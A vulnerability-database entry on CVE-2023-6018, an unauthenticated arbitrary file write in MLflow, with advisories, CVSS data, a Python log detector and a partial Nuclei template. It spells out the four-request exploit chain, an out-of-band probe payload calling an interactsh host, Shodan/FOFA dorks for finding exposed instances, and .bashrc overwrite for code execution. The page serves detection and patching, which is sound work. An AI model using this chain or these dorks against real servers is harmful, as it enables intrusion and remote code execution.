CVE-2023-6018
Published 2023-11-16
CVE-2023-6018: An attacker can overwrite any file on the server hosting MLflow without any authentication.
Priority: P180 | critical | CVSS 3.1: 9.8
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 47.87% (98.7th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mlflow | mlflow_mlflow | >= 0 < 2.9.2 | 2.9.2 |
| mlflow | mlflow_mlflow | unspecified – latest | — |
Detection & IOCs (extracted from sources)
command: `{"name": "{{model_name}}", "source": "http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/"}`
- Monitor for unauthenticated POST requests to /ajax-api/2.0/mlflow/registered-models/create and /ajax-api/2.0/mlflow/model-versions/create — these are the first two steps of the exploit chain.
- Detect model-version creation requests where the 'source' field contains an external HTTP URL (SSRF/arbitrary-write pivot), particularly pointing to /api/2.0/mlflow-artifacts/artifacts/.
- Detect model-version creation requests where the 'source' field uses the models:/ URI scheme referencing a previously created model, which is the second stage of the exploit chain enabling arbitrary file write.
- Monitor GET requests to /model-versions/get-artifact with arbitrary path parameters — this endpoint is used to trigger the file write in the final exploit step.
- Use Shodan/FOFA to identify exposed MLflow instances as potential targets: Shodan query http.title:"mlflow", FOFA queries title="mlflow" or app="mlflow", Google dork intitle:"mlflow".
- Confirm exploitation by checking for an outbound HTTP interaction (OOB callback) triggered during model-version creation with an external source URL — a successful callback indicates the server fetched the attacker-controlled URL.
- Validate MLflow API responses for the presence of 'registered_model' and 'name' fields in the body to confirm a live, exploitable MLflow instance.
- The exploit requires a sequence of exactly 4 HTTP requests (max-request: 4): create a registered model, create a model version with an external HTTP source, create a second model version with a models:/ source referencing the first, then trigger artifact retrieval. All steps must succeed for arbitrary file write.
- No authentication is required for any of the four exploit steps — the vulnerability is exploitable by completely unauthenticated attackers.
- The exploit is classified as intrusive (tag: intrusive) — running detection probes will actively create registered models and model versions on the target MLflow instance.
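The monitoring points above can be correlated per client, shown here as an added example that is not part of the original page or of the Nuclei template. It assumes a reverse proxy or WAF in front of MLflow that records request bodies; the record fields (`client`, `method`, `path`, `body`) and the sample records are constructed, and authentication state is not checked because the page states none is required.

```python
import json
from urllib.parse import urlparse
CREATE_MODEL = "/ajax-api/2.0/mlflow/registered-models/create"  # paths as listed above
CREATE_VERSION = "/ajax-api/2.0/mlflow/model-versions/create"
GET_ARTIFACT = "/model-versions/get-artifact"
CHAIN = ["create-model", "remote-source", "models-uri-source", "get-artifact"]

def classify(event):
    """Return the chain stage a request matches, or None."""
    method, path = event["method"].upper(), urlparse(event["path"]).path
    if method == "GET" and path.endswith(GET_ARTIFACT):
        return "get-artifact"
    if method == "POST" and path == CREATE_MODEL:
        return "create-model"
    if method != "POST" or path != CREATE_VERSION:
        return None
    try:  # body is untrusted: tolerate non-JSON and non-object input
        source = str(json.loads(event.get("body") or "{}").get("source", ""))
        scheme = urlparse(source).scheme.lower()
    except (ValueError, AttributeError):
        return None
    return {"http": "remote-source", "https": "remote-source",
            "models": "models-uri-source"}.get(scheme)

def detect(events):
    """Group stage hits per client; full_chain means all four appear in order."""
    hits = {}
    for ev in events:  # assumed to be in time order
        stage = classify(ev)
        if stage:
            hits.setdefault(ev["client"], []).append(stage)
    alerts = []
    for client, stages in hits.items():
        remaining = iter(stages)
        full = all(step in remaining for step in CHAIN)  # ordered-subsequence test
        alerts.append({"client": client, "stages": stages, "full_chain": full})
    return alerts

# Constructed sample: one client walking all four stages, one benign registration.
FIELDS = ("client", "method", "path", "body")  # hypothetical record shape
SAMPLE = [dict(zip(FIELDS, row)) for row in [
    ("198.51.100.7", "POST", CREATE_MODEL, '{"name": "m1"}'),
    ("198.51.100.7", "POST", CREATE_VERSION,
     '{"name": "m1", "source": "http://collector.example/api/2.0/mlflow-artifacts/artifacts/"}'),
    ("198.51.100.7", "POST", CREATE_VERSION, '{"name": "m2", "source": "models:/m1/1"}'),
    ("198.51.100.7", "GET", GET_ARTIFACT + "?path=constructed.txt", ""),
    ("10.0.0.5", "POST", CREATE_VERSION, '{"name": "prod", "source": "s3://bucket/run/model"}'),
]]
print(detect(SAMPLE))
```

A single stage on its own (for example a lone registered-model creation) is normal MLflow use; the `full_chain` flag is the high-confidence signal.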
CVSS provenance
- nvd, v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- nvd, v3.0: 10.0 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
OSV
Remote Code Execution due to Full Controled File Write in mlflow
osv·2023-11-16
CVE-2023-6018 [CRITICAL] Remote Code Execution due to Full Controled File Write in mlflow
The mlflow web server includes tools for tracking experiments, packaging code into reproducible runs, and sharing and deploying models. As this vulnerability allows writing or overwriting any file on the file system, it gives a lot of ways to achieve code execution (like overwriting `/home//.bashrc`). A malicious user could use this issue to get command execution on the vulnerable machine and get access to data & models information.
GHSA
Remote Code Execution due to Full Controled File Write in mlflow
ghsa·2023-11-16
CVE-2023-6018 [CRITICAL] CWE-78 Remote Code Execution due to Full Controled File Write in mlflow
The mlflow web server includes tools for tracking experiments, packaging code into reproducible runs, and sharing and deploying models. As this vulnerability allows writing or overwriting any file on the file system, it gives a lot of ways to achieve code execution (like overwriting `/home//.bashrc`). A malicious user could use this issue to get command execution on the vulnerable machine and get access to data & models information.
No detection rules found.
Nuclei
Mlflow - Arbitrary File Write
nuclei·CVSS 9.8
CVE-2023-6018 [CRITICAL] Mlflow - Arbitrary File Write
An attacker can overwrite any file on the server hosting MLflow without any authentication.
Template:
```yaml
id: CVE-2023-6018

info:
  name: Mlflow - Arbitrary File Write
  author: byt3bl33d3r
  severity: critical
  description: |
    An attacker can overwrite any file on the server hosting MLflow without any authentication.
  impact: |
    Unauthenticated attackers can overwrite any file on the server hosting MLflow, potentially compromising system integrity and enabling remote code execution.
  remediation: |
    Secure the MLflow instance by implementing authentication and access controls, and update to the latest patched version.
  reference:
    - https://huntr.com/bounties/7cf918b5-43f4-48c0-a371-4d963ce69b30/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6018
  classification:
    cvss-metrics
```
No writeups or analysis indexed.
Published: 2023-11-16